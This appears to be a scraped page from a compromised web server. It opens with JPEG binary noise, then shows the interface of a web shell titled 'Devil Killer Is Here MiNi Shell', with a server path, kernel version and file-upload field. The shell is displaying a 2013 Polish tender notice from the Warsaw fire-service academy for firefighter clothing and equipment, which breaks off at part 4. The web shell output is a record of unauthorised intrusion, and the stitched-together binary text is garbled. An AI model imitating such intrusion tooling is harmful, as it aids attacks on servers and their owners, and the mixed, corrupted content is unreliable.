JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130506/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20130506/176430-N-2013.html

<p class="kh_header"><b>Warszawa: Odzież specjalna i środki ochrony indywidualnej użytkowane w Państwowej Straży Pożarnej</b><br>
<b>Numer ogłoszenia: 176430 - 2013; data zamieszczenia: 06.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szkoła Główna Służby Pożarniczej , ul. Słowackiego 52/54, 01-629 Warszawa, woj. mazowieckie, tel. 022 5617624, faks 022 8330724.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sgsp.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odzież specjalna i środki ochrony indywidualnej użytkowane w Państwowej Straży Pożarnej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa do siedziby Zamawiającego odzieży specjalnej i środków ochrony indywidualnej użytkowanych w Państwowej Straży Pożarnej, w tym:
część I:        Rękawice specjalne
część II:       Kominiarka
część III:     Ubrania specjalne
część IV:      Buty strażackie
część V:        Hełm strażacki
część VI:      Zatrzaśnik strażacki duży 
część VII:     Pas strażacki 
część VIII:    Topór strażacki lekki
część IX:       Pochewka na toporek
część X:        Podpinka linkowa
część XI:       Ubrania koszarowe
część XII:      Obuwie koszarowe
część XIII:    Ubranie dla kadry dowódczo - sztabowej
część XIV:     Buty dla kadry dowódczo - sztabowej
część XV:       Sztormiak
część XVI:     Koszulki letnie i koszulki zimowe
część XVII:   Worek marynarski
część XVIII:  Plecak kostka - khaki
część XIX:     Manierka
część XX:       Menażka
część XXI:     Półbuty służbowe
część XXII:  Teczka służbowa
część XXIII: Walizka

Szczegółowy opis przedmiotu zamówienia znajduje się w rozdziale II Specyfikacji istotnych warunków zamówienia pn. Opis szczegółowy przedmiotu zamówienia i został określony szczegółowo dla każdej z dwudziesty trzech części oddzielnie..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 18.41.00.00-6, 35.11.00.00-8, 35.81.20.00-9, 35.81.11.00-3, 18.93.11.00-5, 39.22.12.60-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 23.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1) Wykonawca przystępujący do przetargu jest obowiązany wnieść wadium na wskazane części zamówienia w wysokości: 
- część I:Rękawice specjalne	500,00 zł      (słownie: pięćset złotych)
- część III:	Ubrania specjalne	4000, 00 zł   (słownie: cztery tysiące złotych)
- część IV:	Buty strażackie	1400, 00 zł   (słownie: tysiąc czterysta złotych)
- część V	Hełm strażacki	1200, 00 zł  (słownie: tysiąc dwieście złotych)
- część XI:	Ubrania koszarowe	2000, 00 zł   (słownie: dwa tysiące złotych)
Na pozostałe części zamówienia nie wymaga się wniesienia wadium.

2)Okres ważności wadium musi obejmować cały okres związania ofertą.

3) Forma wadium.
Wadium może być wniesione w następujących formach:
a) pieniądzu,
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c) gwarancjach bankowych,
d) gwarancjach ubezpieczeniowych,
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 z późn. zm.)

4) W przypadku składania przez Wykonawcę wadium w formie gwarancji, gwarancja musi być gwarancją nieodwołalną, bezwarunkową i płatną na pierwsze pisemne żądanie Zamawiającego, sporządzoną zgodnie z obowiązującym prawem i winna zawierać następujące elementy:
a) nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji (Zamawiającego), gwaranta (banku lub instytucji ubezpieczeniowej udzielających gwarancji) oraz wskazanie ich siedzib,
b) określenie wierzytelności, która ma być zabezpieczona gwarancją,
c) kwotę gwarancji,
d) termin ważności gwarancji,
e) zobowiązanie gwaranta do: zapłacenia kwoty gwarancji na pierwsze pisemne żądanie Zamawiającego zawierające oświadczenie, iż Wykonawca, którego ofertę wybrano:
- odmówił podpisania umowy na warunkach określonych w ofercie, lub
- nie wniósł zabezpieczenia należytego wykonania umowy, lub
- zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy,
oraz przed wyborem oferty najkorzystniejszej
- jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 Pzp, nie złożył dokumentów lub oświadczeń , o których mowa w art. 25 ust. 1 lub pełnomocnictw, chyba że udowodni, iż wynika to z przyczyn nieleżących po jego stronie.

5) Miejsce i sposób wniesienia wadium.

Wadium wnoszone w pieniądzu należy wpłacić na następujący rachunek Zamawiającego:

nr 68 1030 1508 0000 0008 1630 1084  w BH 
tytułem: wadium w sprawie PN 11/13 Odzież specjalna - część .......
W przypadku wnoszenia wadium w innej formie niż pieniężnej, Wykonawca winien złożyć w ofercie kserokopię dokumentu poświadczoną za zgodność z oryginałem przez Wykonawcę, przy czym oryginał dokumentu należy złożyć w oddzielnej kopercie wraz z ofertą.

W przypadku przelewu wadium na konto Zamawiającego, do oferty należy dołączyć kserokopię przelewu potwierdzoną za zgodność z oryginałem.

Za skutecznie wniesione wadium w pieniądzu, Zamawiający uzna wadium, które w oznaczonym terminie tj. terminie złożenia oferty znajduje się na rachunku Zamawiającego.

6) Termin wniesienia wadium.

- Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert.
- Wykonawca zostanie wykluczony z niniejszego postępowania, jeżeli jego oferta przed upływem terminu składania ofert nie zostanie zabezpieczona wadium w wymaganej wysokości i w wybranej formie spośród możliwych wyżej wymienionych.

7) Utrata wadium.

Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:

- odmówił podpisania umowy na warunkach określonych w ofercie, lub
- nie wniósł zabezpieczenia należytego wykonania umowy, lub
- zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy,
oraz przed wyborem oferty najkorzystniejszej
- jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 Pzp, nie złożył dokumentów lub oświadczeń , o których mowa w art. 25 ust. 1 lub pełnomocnictw, chyba że udowodni, iż wynika to z przyczyn nie leżących po jego stronie.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie wymaga się od wykonawców posiadania specjalnych uprawnień.
W tym zakresie, poza oświadczeniem którego treść zawarta jest w zał. nr 2 do SIWZ,  nie wymaga się od Wykonawcy spełnienia innych warunków.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W tym zakresie wymaga się od wykonawców składających ofertę na część I,III,IV,V,XI i XII przedłożenia wykazu (wg. Rozdziału III załącznik nr 4) dostaw przedmiotów umundurowania dla Państwowej Straży Pożarnej wykonanych w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy -  w tym okresie, wraz z podaniem ich przedmiotu i wartości, daty wykonania i podmiotów na rzecz których dostawy zostały wykonane oraz załączeniem dowodów , czy zostały wykonane lub są wykonywane należycie.

(Definicja dowodu określona została w Rozporządzenia Prezesa Rady Ministrów z dnia 19.02.2013 r. (Dz. U. 2013 poz. 231) §1 ust. 2.)

W celu spełnienia warunku udziału w postępowaniu wymaga się aby Wykonawca wykazał , że wśród wykazanych jw. dostaw zrealizował min.:

Cz. I: jedną dostawę rękawic specjalnych o wartości min. 15 000,00 zł,
Cz. III: jedną dostawę ubrań specjalnych   o wartości min. 100 000,00 zł,
Cz. IV: jedną dostawę butów strażackich   o wartości min. 40 000,00 zł,
Cz. V: jedną dostawę hełmów o wartości min. 50 000,00 zł,
Cz. XI: jedną dostawę ubrań koszarowych o wartości min. 70 000,00 zł,
Cz. XII: jedną dostawę obuwia koszarowego o wartości min. 10 000,00 zł,
(dotyczy wyłącznie części na którą Wykonawca składa ofertę)

Ocena spełniania przez wykonawców wyżej wymienionego warunku wg formuły spełnia -nie spełnia, polegać będzie na sprawdzeniu czy wykazane dostawy (wg. Rozdziału II      dokument 3) odpowiadają stawianym wymaganiom. 

Dla pozostałych części poza oświadczeniem którego treść zawarta jest w zał. nr 2 do SIWZ, nie wymaga się od Wykonawcy spełnienia innych warunków.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W tym zakresie, poza oświadczeniem którego treść zawarta jest w zał. nr 2 do SIWZ,   nie wymaga się od Wykonawcy spełnienia innych warunków.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W tym zakresie, poza oświadczeniem którego treść zawarta jest w zał. nr 2 do SIWZ,   nie wymaga się od Wykonawcy spełnienia innych warunków.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W tym zakresie, poza oświadczeniem którego treść zawarta jest w zał. nr 2 do SIWZ,   nie wymaga się od Wykonawcy spełnienia innych warunków.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1. Aktualne świadectwo dopuszczenia wyrobu do użytkowania wydane przez CNBOP w Józefowie, zgodne z §6 Rozporządzenia MSWiA z dnia 20 czerwca 2007 r.  (Dz. U. z 2007 r. Nr.143 poz.1002 z późn. zm.) - dotyczy części I - VIII.
2. Deklaracja zgodności WE dla oferowanego produktu, sporządzona zgodnie z § 36 rozporządzenia Ministra Gospodarki z dnia 21 grudnia 2005 r. w sprawie zasadniczych wymagań dla środków ochrony indywidualnej  (Dz. U. z 2005 r. Nr 259, poz. 2173) - dotyczy części I -  VI.
3. Oświadczenie Wykonawcy dotyczące oferowanych wyrobów, które stanowi załącznik nr 3 do SIWZ - dotyczy części XI - XVI i XXI-XXIII.
4. Wzór oferowanego przedmiotu umundurowania zgodny/identyczny z produktem który       zostanie dostarczony na etapie realizacji umowy (dotyczy wszystkich części). 

Wzory zostaną zwrócone Wykonawcom po zakończeniu postępowania na ich koszt lub możliwy będzie odbiór osobisty w siedzibie Zamawiającego.
Wybranemu Wykonawcy wzory zostaną zwrócone po dokonanej dostawie przedmiotu zamówienia i dokonaniu jego pozytywnego odbioru.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Na etapie odbioru przedmiotu umowy, Wykonawca, którego oferta zostanie wybrana za najkorzystniejszą i zostanie z nim zawarta umowa, będzie zobowiązany złożyć (w oryginale lub kserokopię poświadczoną za zgodność z oryginałem): 

1. Certyfikat oceny typu WE wydany przez jednostkę notyfikowaną właściwą dla danego środka ochrony indywidualnej - dotyczy części I-VI.
2. Ostatnie sprawozdanie z badań przeprowadzone w ramach sprawowania nadzoru nad certyfikatem WE przez jednostkę  notyfikowaną, z którą została zawarta umowa o której mowa w pkt. 2, zgodnie z § 40 lub § 41 rozporządzenia Ministra Gospodarki z dnia 21 grudnia 2005 r. - dotyczy części I-VI
3. Instrukcję użytkowania , przechowywania i konserwacji wykonaną zgodnie z obowiązującymi przepisami dla oferowanego produktu.
4. Dopuszczenie do kontaktu z żywnością - dot. części XIX i XX.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Okres gwarancji - 20</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>2. Zamawiający dopuszcza możliwość dokonania zmiany  istotnych postanowień zawartej umowy, w stosunku do treści oferty, w zakresie: 
1) ustawowej zmiany stawki podatku VAT.
2) terminu realizacji przedmiotu zamówienia - gdy wystąpi konieczność zmiany terminu w związku z wydłużającym się postępowaniem lub zaistnieją okoliczności mające wpływ na termin realizacji, a których nie udało się przewidzieć w chwili zawarcia umowy.
3) parametrów technicznych przedmiotu zamówienia - w przypadku gdy zmiany te będą korzystniejsze dla zamawiającego
Powyższe zmiany będą dopuszczalne, przy założeniu, że nie ulegnie zmianie cena ofertowa.  Każda ewentualna zmiana wymagać będzie odrębnego rozpatrzenia i zasadności jej wprowadzenia oraz wymagać będzie formy aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sgsp.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W siedzibie SGSP w Warszawie ul. Słowackiego 52/54  Dział Zamówień Publicznych pok. 323 - wejście od ul. Siemiradzkiego 2 (obiekt 02)..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.05.2013 godzina 10:00, miejsce: W siedzibie SGSP w Warszawie ul. Słowackiego 52/54  KANCELARIA OGÓLNA pok. 102 - wejście od ul. Siemiradzkiego 2 (obiekt 02)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Rękawice specjalne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Termin dostawy: do 12 lipiec  2013 r.

Ilość: docelowo 120 par, z tym że:

- Wykonawca do dnia 12.07.2013r. dostarczy Zamawiającemu 170 par rękawic wg niżej     wymienionych rozmiarów  (na koszt Wykonawcy),
- W dniach od 26.07.2013r. do 31.07.2013r. Zamawiający wyda przybyłym do Szkoły     Kandydatom rękawice w ilości 120 par,
- W dniu 01.08.2013r. Zamawiający zwróci wykonawcy pozostałe 50 par rękawic (na koszt     Wykonawcy),
- Zamawiający zapłaci Wykonawcy za 120 par rękawic.

Rozmiary:
Lp.	Rozmiar	Ilość par
1.	9	70
2.	10	70
3.	11	30

Opis:
Wykonane zgodnie z wymaganiami techniczno - użytkowymi pkt. 1.7. Rękawice specjalne określonymi szczegółowo w Załączniku do Rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 20 czerwca 2007 r. (Dz. U. z 2007 r. nr 143. Poz. 1002 z późn. zm.).

Wyrób powinien spełniać wymagania obowiązujących norm scharmonizowanych w tym:
- PN- EN 659 + A1,

Oznakowanie wyrobu:

- Zgodne z obowiązującymi przepisami w tym  Rozporządzenia MSWiA z dnia 20 czerwca 2007 r.  (Dz. U. z 2007 r. Nr.143 poz.1002 z poźn. zm. ),
- rozmiar

Ponadto:
- mankiet ze ściągaczem wchodzący pod rękaw ubrania specjalnego,
- podszewka z tkaniny z włókien aramidowych lub równoważnych,
- membrana paroprzepuszczalna - oddychająca,
- materiał zewnętrzny: tkanina z włókien aramidowych o podwyższonej odporności 
na rozdarcia i przetarcia

Gwarancja:
Minimum 24 m-ce..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.41.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 12.07.2013.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Kominiarka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość: 	90 szt.

Rozmiary:
Lp.	Rozmiar	Ilość szt.
1.	M	40
2.	L	40
3.	XL	10

Opis:
Wykonane zgodnie z wymaganiami techniczno - użytkowymi pkt. 1.8. Kominiarki określonymi szczegółowo w Załączniku do Rozporządzenia Ministra Spraw Wewnętrznych 
i Administracji z dnia 20 czerwca 2007 r. (Dz. U. z 2007 r. nr 143. Poz. 1002 z późn. zm.).

Wyrób powinien spełniać wymagania obowiązujących norm scharmonizowanych w tym:
- PN-EN 13911

Oznakowanie wyrobu:

- Zgodne z obowiązującymi przepisami w tym  Rozporządzenia MSWiA z dnia 20 czerwca 2007 r.  (Dz. U. z 2007 r. Nr.143 poz.1002 z późn. zm.),
- rozmiar

Gwarancja:
Minimum 24 m-ce..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.41.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.06.2013.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Ubrania specjalne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość: 	100 kpl.

Rozmiary - Zamawiający poda do dnia 02.09.2013r.

Opis:
Wykonane zgodnie z wymaganiami techniczno - użytkowymi pkt. 1.6. Ubrania specjalne określonymi szczegółowo w Załączniku do Rozporządzenia Ministra Spraw Wewnętrznych 
i Administracji z dnia 20 czerwca 2007 r. (Dz. U. z 2007 r. nr 143. Poz. 1002 z późn. zm.). 

Wyrób powinien spełniać wymagania obowiązujących norm scharmonizowanych w tym:
- PN - EN 469
- Poziom ochrony - 2.

Oznakowanie wyrobu:
Zgodne z obowiązującymi przepisami w tym  Rozporządzenia MSWiA z dnia 20 czerwca 2007 r.  (Dz. U. z 2007 r. Nr.143 poz.1002 z późn. zm.).

Z wariantowych wymagań wybiera się:
- Warstwy kurtki jako oddzielne (odpinana podpinka).
- Na wysokości kolan dodatkowy wkład i wzmocnienia chroniące staw kolanowy (min. Wys. 30 cm, szer. 21 cm - w najszerszym punkcie), naszyty na zewnątrz z zawartością włókien powlekanych silikonem

Ponadto:
1. Tkanina zasadnicza: min. 98% udział włókien aramidowych typu NOMEX lub KERMEL
2. Membrana: laminat typu PTFE
3. Nici użyte: 100% włókno aramidowe
4. Zamek w kurtce: metalowy, mocny, grubo cząsteczkowy, dwugłowicowy rozpinany na       wysokości krocza
5. Podszewka: aramidowo - wiskozowa (min. 50% aramidów)
      - potwierdzone w Świadectwie Dopuszczenia

Gwarancja:
Minimum 36 m-cy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.41.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.09.2013.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Buty strażackie.</p>
